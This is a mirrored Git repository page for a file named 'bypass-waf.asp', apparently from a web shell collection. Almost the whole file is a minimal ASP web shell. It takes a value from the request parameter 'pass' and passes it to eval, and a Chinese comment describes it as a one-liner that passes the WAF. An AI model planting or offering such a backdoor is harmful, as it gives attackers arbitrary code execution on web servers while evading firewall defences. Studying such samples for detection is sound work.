1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/asp/bypass-waf.asp
2014-11-17 10:26:20 +08:00

9 lines
102 B
Plaintext

<%
dim x1,x2
x1 = request("pass")
x2 = x1
eval x2
%>
<!-- yes++ -->
<!-- 一句话 pass waf -->